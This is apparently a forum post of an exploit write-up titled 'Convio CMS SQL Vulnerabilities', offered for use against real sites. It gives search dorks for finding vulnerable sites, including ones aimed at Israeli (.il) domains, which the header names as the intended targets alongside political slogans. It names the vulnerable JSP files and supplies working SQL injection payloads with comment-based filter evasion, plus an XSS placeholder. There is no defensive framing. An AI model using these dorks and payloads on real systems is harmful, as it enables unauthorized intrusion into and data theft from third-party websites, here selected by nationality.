Code:
###########################################################################################
# #
# Exploit Title : Convio CMS SQL Vulnerabilities #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Portal Link : www.convio.com (http://convio.com/) #
# #
# Security Risk : H #
# #
# Description : All target's IL websites #
# #
# DorK : "site:.com /about/news/index.jsp?page=2" #
# DorK : "site:.il /about/news/index.jsp?page=2" #
# #
###########################################################################################
# #
# Free Free Palestine #
# Israel is committing infanticide and a holocaust in Palestine and Gaza #
###########################################################################################
#Details :
[HASH=1029]#the[/HASH] vulnerable file is "index.jsp" and "session-status.jsp"
[HASH=1030]#Expl0iTs[/HASH] :
#https://www.TARGET.com/about/news/index.jsp?page=2{sql inject code}
[HASH=1031]#Dem0[/HASH] :
#https://www.
TARGET.com/about/news/index.jsp?page=2 RLIKE (case when 7273121=7273121 then 0x74657374696E70757476616C7565 else 0x28 end)
[HASH=1031]#Dem0[/HASH] :
#https://www.TARGET.com/system/auth/session-status.jsp?nocache=99999999/**/oR/**/5563379=5563379--
[HASH=1031]#Dem0[/HASH] :
#https://www.TARGET.com/system/auth/session-status.jsp?nocache=1715702042268%27/**/RLIKE/**/(case/**/when/**//**/4007635=4007635/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'%'='
[HASH=1032]#XSS[/HASH] : https://www.TARGET.com/search/?q=<XSS SCRIPT BYPASS>
![[DK]](/data/avatars/s/57/57999.jpg?1720990206){kind=avatar}
